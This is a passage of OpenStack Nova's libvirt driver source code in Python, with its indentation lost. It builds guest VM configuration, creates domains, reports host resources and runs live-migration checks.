# we only support os_command_line with images with an explicit
# kernel set and don't want to break nova if there's an
# os_command_line property without a specified kernel_id param
if image_meta:
img_props = image_meta.get('properties', {})
if img_props.get('os_command_line'):
guest.os_cmdline = img_props.get('os_command_line')
else:
guest.os_boot_dev = blockinfo.get_boot_order(disk_info)
if ((CONF.libvirt.virt_type != "lxc" and
CONF.libvirt.virt_type != "uml")):
guest.acpi = True
guest.apic = True
# NOTE(mikal): Microsoft Windows expects the clock to be in
# "localtime". If the clock is set to UTC, then you can use a
# registry key to let windows know, but Microsoft says this is
# buggy in http://support.microsoft.com/kb/2687252
clk = vconfig.LibvirtConfigGuestClock()
if instance['os_type'] == 'windows':
LOG.info(_LI('Configuring timezone for windows instance to '
'localtime'), instance=instance)
clk.offset = 'localtime'
else:
clk.offset = 'utc'
guest.set_clock(clk)
if CONF.libvirt.virt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
clk.add_timer(tmpit)
clk.add_timer(tmrtc)
arch = libvirt_utils.get_arch(image_meta)
if arch in ("i686", "x86_64"):
# NOTE(rfolco): HPET is a hardware timer for x86 arch.
# qemu -no-hpet is not supported on non-x86 targets.
tmhpet = vconfig.LibvirtConfigGuestTimer()
tmhpet.name = "hpet"
tmhpet.present = False
clk.add_timer(tmhpet)
for config in self._get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
flavor):
guest.add_device(config)
for vif in network_info:
config = self.vif_driver.get_config(
instance, vif, image_meta,
flavor, CONF.libvirt.virt_type)
guest.add_device(config)
if ((CONF.libvirt.virt_type == "qemu" or
CONF.libvirt.virt_type == "kvm")):
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.libvirt.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.libvirt.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt.virt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
add_video_driver = False
if ((CONF.vnc_enabled and
CONF.libvirt.virt_type not in ('lxc', 'uml'))):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
add_video_driver = True
if CONF.spice.enabled and \
CONF.libvirt.virt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
add_video_driver = True
if add_video_driver:
VALID_VIDEO_DEVICES = ("vga", "cirrus", "vmvga", "xen", "qxl")
video = vconfig.LibvirtConfigGuestVideo()
# NOTE(ldbragst): The following logic sets the video.type
# depending on supported defaults given the architecture,
# virtualization type, and features. The video.type attribute can
# be overridden by the user with image_meta['properties'], which
# is carried out in the next if statement below this one.
arch = libvirt_utils.get_arch(image_meta)
if guest.os_type == vm_mode.XEN:
video.type = 'xen'
elif arch in ('ppc', 'ppc64'):
# NOTE(ldbragst): PowerKVM doesn't support 'cirrus' be default
# so use 'vga' instead when running on Power hardware.
video.type = 'vga'
elif CONF.spice.enabled:
video.type = 'qxl'
if img_meta_prop.get('hw_video_model'):
video.type = img_meta_prop.get('hw_video_model')
if (video.type not in VALID_VIDEO_DEVICES):
raise exception.InvalidVideoMode(model=video.type)
# Set video memory, only if the flavor's limit is set
video_ram = int(img_meta_prop.get('hw_video_ram', 0))
max_vram = int(flavor.extra_specs
.get('hw_video:ram_max_mb', 0))
if video_ram > max_vram:
raise exception.RequestedVRamTooHigh(req_vram=video_ram,
max_vram=max_vram)
if max_vram and video_ram:
video.vram = video_ram
guest.add_device(video)
# Qemu guest agent only support 'qemu' and 'kvm' hypervisor
if CONF.libvirt.virt_type in ('qemu', 'kvm'):
qga_enabled = False
# Enable qga only if the 'hw_qemu_guest_agent' is equal to yes
hw_qga = img_meta_prop.get('hw_qemu_guest_agent', 'no')
if hw_qga.lower() == 'yes':
LOG.debug("Qemu guest agent is enabled through image "
"metadata", instance=instance)
qga_enabled = True
if qga_enabled:
qga = vconfig.LibvirtConfigGuestChannel()
qga.type = "unix"
qga.target_name = "org.qemu.guest_agent.0"
qga.source_path = ("/var/lib/libvirt/qemu/%s.%s.sock" %
("org.qemu.guest_agent.0", instance['name']))
guest.add_device(qga)
if (img_meta_prop.get('hw_rng_model') == 'virtio' and
flavor.extra_specs.get('hw_rng:allowed',
'').lower() == 'true'):
rng_device = vconfig.LibvirtConfigGuestRng()
rate_bytes = flavor.extra_specs.get('hw_rng:rate_bytes', 0)
period = flavor.extra_specs.get('hw_rng:rate_period', 0)
if rate_bytes:
rng_device.rate_bytes = int(rate_bytes)
rng_device.rate_period = int(period)
if (CONF.libvirt.rng_dev_path and
not os.path.exists(CONF.libvirt.rng_dev_path)):
raise exception.RngDeviceNotExist(
path=CONF.libvirt.rng_dev_path)
rng_device.backend = CONF.libvirt.rng_dev_path
guest.add_device(rng_device)
if CONF.libvirt.virt_type in ('xen', 'qemu', 'kvm'):
for pci_dev in pci_manager.get_instance_pci_devs(instance):
guest.add_device(self._get_guest_pci_device(pci_dev))
else:
if len(pci_manager.get_instance_pci_devs(instance)) > 0:
raise exception.PciDeviceUnsupportedHypervisor(
type=CONF.libvirt.virt_type)
watchdog_action = flavor.extra_specs.get('hw_watchdog_action',
'disabled')
if (image_meta is not None and
image_meta.get('properties', {}).get('hw_watchdog_action')):
watchdog_action = image_meta['properties']['hw_watchdog_action']
# NB(sross): currently only actually supported by KVM/QEmu
if watchdog_action != 'disabled':
if watchdog_actions.is_valid_watchdog_action(watchdog_action):
bark = vconfig.LibvirtConfigGuestWatchdog()
bark.action = watchdog_action
guest.add_device(bark)
else:
raise exception.InvalidWatchdogAction(action=watchdog_action)
return guest
def _get_guest_xml(self, context, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
if image_meta is None:
image_ref = instance['image_ref']
image_meta = compute_utils.get_image_metadata(
context, self._image_api, image_ref, instance)
# NOTE(danms): Stringifying a NetworkInfo will take a lock. Do
# this ahead of time so that we don't acquire it while also
# holding the logging lock.
network_info_str = str(network_info)
msg = ('Start _get_guest_xml '
'network_info=%(network_info)s '
'disk_info=%(disk_info)s '
'image_meta=%(image_meta)s rescue=%(rescue)s '
'block_device_info=%(block_device_info)s' %
{'network_info': network_info_str, 'disk_info': disk_info,
'image_meta': image_meta, 'rescue': rescue,
'block_device_info': block_device_info})
# NOTE(mriedem): block_device_info can contain auth_password so we
# need to sanitize the password in the message.
LOG.debug(logging.mask_password(msg), instance=instance)
conf = self._get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info,
context)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug('End _get_guest_xml xml=%(xml)s',
{'xml': xml}, instance=instance)
return xml
def _lookup_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
dom_info = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[dom_info[0]],
'max_mem': dom_info[1],
'mem': dom_info[2],
'num_cpu': dom_info[3],
'cpu_time': dom_info[4],
'id': virt_dom.ID()}
def _create_domain_setup_lxc(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
rootfs_dev = disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
try:
# Save rootfs device to disconnect it when deleting the instance
if rootfs_dev:
instance.system_metadata['rootfs_device_name'] = rootfs_dev
instance.save()
except Exception:
with excutils.save_and_reraise_exception():
self._create_domain_cleanup_lxc(instance)
def _create_domain_cleanup_lxc(self, instance):
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
# The domain may not be present if the instance failed to start
state = None
if state == power_state.RUNNING:
# NOTE(uni): Now the container is running with its own private
# mount namespace and so there is no need to keep the container
# rootfs mounted in the host namespace
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0, power_on=True):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
err = None
if instance and CONF.libvirt.virt_type == 'lxc':
self._create_domain_setup_lxc(instance)
try:
if xml:
err = _LE('Error defining a domain with XML: %s') % xml
domain = self._conn.defineXML(xml)
if power_on:
err = _LE('Error launching a defined domain with XML: %s') \
% domain.XMLDesc(0)
domain.createWithFlags(launch_flags)
if not utils.is_neutron():
err = _LE('Error enabling hairpin mode with XML: %s') \
% domain.XMLDesc(0)
self._enable_hairpin(domain.XMLDesc(0))
except Exception:
with excutils.save_and_reraise_exception():
if err:
LOG.error(err)
finally:
if instance and CONF.libvirt.virt_type == 'lxc':
self._create_domain_cleanup_lxc(instance)
return domain
def _neutron_failed_callback(self, event_name, instance):
LOG.error(_LE('Neutron Reported failure on event '
'%(event)s for instance %(uuid)s'),
{'event': event_name, 'uuid': instance.uuid})
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfaceCreateException()
def _get_neutron_events(self, network_info):
# NOTE(danms): We need to collect any VIFs that are currently
# down that we expect a down->up event for. Anything that is
# already up will not undergo that transition, and for
# anything that might be stale (cache-wise) assume it's
# already up so we don't block on it.
return [('network-vif-plugged', vif['id'])
for vif in network_info if vif.get('active', True) is False]
def _create_domain_and_network(self, context, xml, instance, network_info,
block_device_info=None, power_on=True,
reboot=False, vifs_already_plugged=False):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(
CONF.libvirt.virt_type, vol)
conf = self._connect_volume(connection_info, disk_info)
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
vol['connection_info'] = connection_info
vol.save(context)
if (not reboot and 'data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
timeout = CONF.vif_plugging_timeout
if (self._conn_supports_start_paused and
utils.is_neutron() and not
vifs_already_plugged and power_on and timeout):
events = self._get_neutron_events(network_info)
else:
events = []
launch_flags = events and libvirt.VIR_DOMAIN_START_PAUSED or 0
domain = None
try:
with self.virtapi.wait_for_instance_event(
instance, events, deadline=timeout,
error_callback=self._neutron_failed_callback):
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance,
network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
domain = self._create_domain(
xml, instance=instance,
launch_flags=launch_flags,
power_on=power_on)
self.firewall_driver.apply_instance_filter(instance,
network_info)
except exception.VirtualInterfaceCreateException:
# Neutron reported failure and we didn't swallow it, so
# bail here
with excutils.save_and_reraise_exception():
if domain:
domain.destroy()
self.cleanup(context, instance, network_info=network_info,
block_device_info=block_device_info)
except eventlet.timeout.Timeout:
# We never heard from Neutron
LOG.warn(_LW('Timeout waiting for vif plugging callback for '
'instance %(uuid)s'), {'uuid': instance['uuid']})
if CONF.vif_plugging_is_fatal:
if domain:
domain.destroy()
self.cleanup(context, instance, network_info=network_info,
block_device_info=block_device_info)
raise exception.VirtualInterfaceCreateException()
# Resume only if domain has been paused
if launch_flags & libvirt.VIR_DOMAIN_START_PAUSED:
domain.resume()
return domain
def _get_all_block_devices(self):
"""Return all block devices in use on this node."""
devices = []
for dom in self._list_instance_domains():
try:
doc = etree.fromstring(dom.XMLDesc(0))
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the XML from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def _get_interfaces(self, xml):
"""Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def _get_vcpu_total(self):
"""Get available vcpu number of physical computer.
:returns: the number of cpu core instances can be used.
"""
if self._vcpu_total != 0:
return self._vcpu_total
try:
total_pcpus = self._conn.getInfo()[2]
except libvirt.libvirtError:
LOG.warn(_LW("Cannot get the number of cpu, because this "
"function is not implemented for this platform. "))
return 0
if CONF.vcpu_pin_set is None:
self._vcpu_total = total_pcpus
return self._vcpu_total
available_ids = hardware.get_vcpu_pin_set()
if available_ids[-1] >= total_pcpus:
raise exception.Invalid(_("Invalid vcpu_pin_set config, "
"out of hypervisor cpu range."))
self._vcpu_total = len(available_ids)
return self._vcpu_total
def _get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def _get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt.images_type == 'lvm':
info = lvm.get_volume_group_info(
CONF.libvirt.images_volume_group)
elif CONF.libvirt.images_type == 'rbd':
info = LibvirtDriver._get_rbd_driver().get_pool_info()
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / units.Gi
return info
def _get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu(s) that are currently being used.
"""
total = 0
if CONF.libvirt.virt_type == 'lxc':
return total + 1
for dom in self._list_instance_domains():
try:
vcpus = dom.vcpus()
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the vpu count from domain id:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
else:
if vcpus is not None and len(vcpus) > 1:
total += len(vcpus[1])
# NOTE(gtt116): give other tasks a chance.
greenthread.sleep(0)
return total
def _get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt.virt_type == 'xen':
used = 0
for dom in self._list_instance_domains(only_guests=False):
try:
dom_mem = int(dom.info()[2])
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s") %
{"uuid": dom.UUIDString(), "ex": e})
continue
# skip dom0
if dom.ID() != 0:
used += dom_mem
else:
# the mem reported by dom0 is be greater of what
# it is being used
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / units.Ki
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self._get_memory_mb_total() - avail / units.Ki
def _get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def _get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
# Trying to do be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def _get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self._conn.getHostname()
if not hasattr(self, '_hypervisor_hostname'):
self._hypervisor_hostname = hostname
elif hostname != self._hypervisor_hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hypervisor_hostname,
'new': hostname})
return self._hypervisor_hostname
def _get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self._get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def _get_cpu_info(self):
"""Get cpuinfo information.
Obtains cpu feature from virConnect.getCapabilities,
and returns as a json string.
:return: see above description
"""
caps = self._get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
# so we could just return the raw capabilities XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
# the libvirt drivers format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
def _get_pcidev_info(self, devname):
"""Returns a dict of PCI device."""
def _get_device_type(cfgdev):
"""Get a PCI device's device type.
An assignable PCI device can be a normal PCI device,
a SR-IOV Physical Function (PF), or a SR-IOV Virtual
Function (VF). Only normal PCI devices or SR-IOV VFs
are assignable, while SR-IOV PFs are always owned by
hypervisor.
Please notice that a PCI device with SR-IOV
capability but not enabled is reported as normal PCI device.
"""
for fun_cap in cfgdev.pci_capability.fun_capability:
if len(fun_cap.device_addrs) != 0:
if fun_cap.type == 'virt_functions':
return {'dev_type': 'type-PF'}
if fun_cap.type == 'phys_function':
phys_address = "%s:%s:%s.%s" % (
fun_cap.device_addrs[0][0].replace("0x", ''),
fun_cap.device_addrs[0][1].replace("0x", ''),
fun_cap.device_addrs[0][2].replace("0x", ''),
fun_cap.device_addrs[0][3].replace("0x", ''))
return {'dev_type': 'type-VF',
'phys_function': phys_address}
return {'dev_type': 'type-PCI'}
virtdev = self._conn.nodeDeviceLookupByName(devname)
xmlstr = virtdev.XMLDesc(0)
cfgdev = vconfig.LibvirtConfigNodeDevice()
cfgdev.parse_str(xmlstr)
address = "%04x:%02x:%02x.%1x" % (
cfgdev.pci_capability.domain,
cfgdev.pci_capability.bus,
cfgdev.pci_capability.slot,
cfgdev.pci_capability.function)
device = {
"dev_id": cfgdev.name,
"address": address,
"product_id": cfgdev.pci_capability.product_id[2:6],
"vendor_id": cfgdev.pci_capability.vendor_id[2:6],
}
# requirement by DataBase Model
device['label'] = 'label_%(vendor_id)s_%(product_id)s' % device
device.update(_get_device_type(cfgdev))
return device
def _pci_device_assignable(self, device):
if device['dev_type'] == 'type-PF':
return False
return self.dev_filter.device_assignable(device)
def _get_pci_passthrough_devices(self):
"""Get host PCI devices information.
Obtains pci devices information from libvirt, and returns
as a JSON string.
Each device information is a dictionary, with mandatory keys
of 'address', 'vendor_id', 'product_id', 'dev_type', 'dev_id',
'label' and other optional device specific information.
Refer to the objects/pci_device.py for more idea of these keys.
:returns: a JSON string containaing a list of the assignable PCI
devices information
"""
# Bail early if we know we can't support `listDevices` to avoid
# repeated warnings within a periodic task
if not getattr(self, '_list_devices_supported', True):
return jsonutils.dumps([])
try:
dev_names = self._conn.listDevices('pci', 0) or []
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
self._list_devices_supported = False
LOG.warn(_LW("URI %(uri)s does not support "
"listDevices: " "%(error)s"),
{'uri': self.uri(), 'error': ex})
return jsonutils.dumps([])
else:
raise
pci_info = []
for name in dev_names:
pci_dev = self._get_pcidev_info(name)
if self._pci_device_assignable(pci_dev):
pci_info.append(pci_dev)
return jsonutils.dumps(pci_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host.
"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
volume_id = bdm['volume_id']
LOG.debug("Trying to get stats for the volume %s",
volume_id)
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
stats = dict(volume=volume_id,
instance=instance,
rd_req=vol_stats[0],
rd_bytes=vol_stats[1],
wr_req=vol_stats[2],
wr_bytes=vol_stats[3],
flush_operations=vol_stats[4])
LOG.debug(
"Got volume usage stats for the volume=%(volume)s,"
" rd_req=%(rd_req)d, rd_bytes=%(rd_bytes)d, "
"wr_req=%(wr_req)d, wr_bytes=%(wr_bytes)d",
stats, instance=instance)
vol_usage.append(stats)
return vol_usage
def block_stats(self, instance_name, disk_id):
"""Note that this function takes an instance name."""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk_id)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_LI('Getting block stats failed, device might have '
'been detached. Instance=%(instance_name)s '
'Disk=%(disk)s Code=%(errcode)s Error=%(e)s'),
{'instance_name': instance_name, 'disk': disk_id,
'errcode': errcode, 'e': e})
except exception.InstanceNotFound:
LOG.info(_LI('Could not find domain in libvirt for instance %s. '
'Cannot get block stats for device'), instance_name)
def interface_stats(self, instance_name, iface_id):
"""Note that this function takes an instance name."""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(iface_id)
def get_console_pool_info(self, console_type):
# TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource information.
This method is called when nova-compute launches, and
as part of a periodic task that records the results in the DB.
:param nodename: will be put in PCI device
:returns: dictionary containing resource info
"""
# Temporary: convert supported_instances into a string, while keeping
# the RPC version as JSON. Can be changed when RPC broadcast is removed
stats = self.get_host_stats(refresh=True)
stats['supported_instances'] = jsonutils.dumps(
stats['supported_instances'])
return stats
def check_instance_shared_storage_local(self, context, instance):
dirpath = libvirt_utils.get_instance_path(instance)
if not os.path.exists(dirpath):
return None
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug("Creating tmpfile %s to verify with other "
"compute node that the instance is on "
"the same shared storage.",
tmp_file, instance=instance)
os.close(fd)
return {"filename": tmp_file}
def check_instance_shared_storage_remote(self, context, data):
return os.path.exists(data['filename'])
def check_instance_shared_storage_cleanup(self, context, data):
fileutils.delete_if_exists(data["filename"])
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing:
:filename: name of the tmpfile under CONF.instances_path
:block_migration: whether this is block migration
:disk_over_commit: disk-over-commit factor on dest host
:disk_available_mb: available disk space on dest host
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
disk_available_mb = \
(disk_available_gb * units.Ki) - CONF.reserved_host_disk_mb
# Compare CPU
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"image_type": CONF.libvirt.images_type,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param context: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, context, instance,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
source = CONF.host
dest_check_data.update({'is_shared_block_storage':
self._is_shared_block_storage(instance, dest_check_data)})
dest_check_data.update({'is_shared_instance_path':
self._is_shared_instance_path(dest_check_data)})
if dest_check_data['block_migration']:
if (dest_check_data['is_shared_block_storage'] or
dest_check_data['is_shared_instance_path']):
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(context, instance,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not (dest_check_data['is_shared_block_storage'] or
dest_check_data['is_shared_instance_path']):
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
# NOTE(mikal): include the instance directory name here because it
# doesn't yet exist on the destination but we want to force that
# same name to be used
instance_path = libvirt_utils.get_instance_path(instance,
relative=True)
dest_check_data['instance_relative_path'] = instance_path
return dest_check_data
def _is_shared_block_storage(self, instance, dest_check_data):
"""Check if all block storage of an instance can be shared
between source and destination of a live migration.
Returns true if the instance is volume backed and has no local disks,
or if the image backend is the same on source and destination and the
backend shares block storage between compute nodes.
"""
if (CONF.libvirt.images_type == dest_check_data.get('image_type') and
self.image_backend.backend().is_shared_block_storage()):
return True
if (dest_check_data.get('is_volume_backed') and
not bool(jsonutils.loads(
self.get_instance_disk_info(instance['name'])))):
# pylint: disable E1120
return True
return False
def _is_shared_instance_path(self, dest_check_data):
"""Check if instance path is shared between source and
destination of a live migration.
"""
return self._check_shared_storage_test_file(
dest_check_data["filename"])
def _assert_dest_node_has_enough_disk(self, context, instance,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
# Libvirt supports qcow2 disk format,which is usually compressed
# on compute nodes.
# Real disk image (compressed) may enlarged to "virtual disk size",
# that is specified as the maximum disk size.
# (See qemu-img -f path-to-disk)
# Scheduler recognizes destination host still has enough disk space
# if real disk size < available disk size
# if disk_over_commit is True,
# otherwise virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * units.Mi
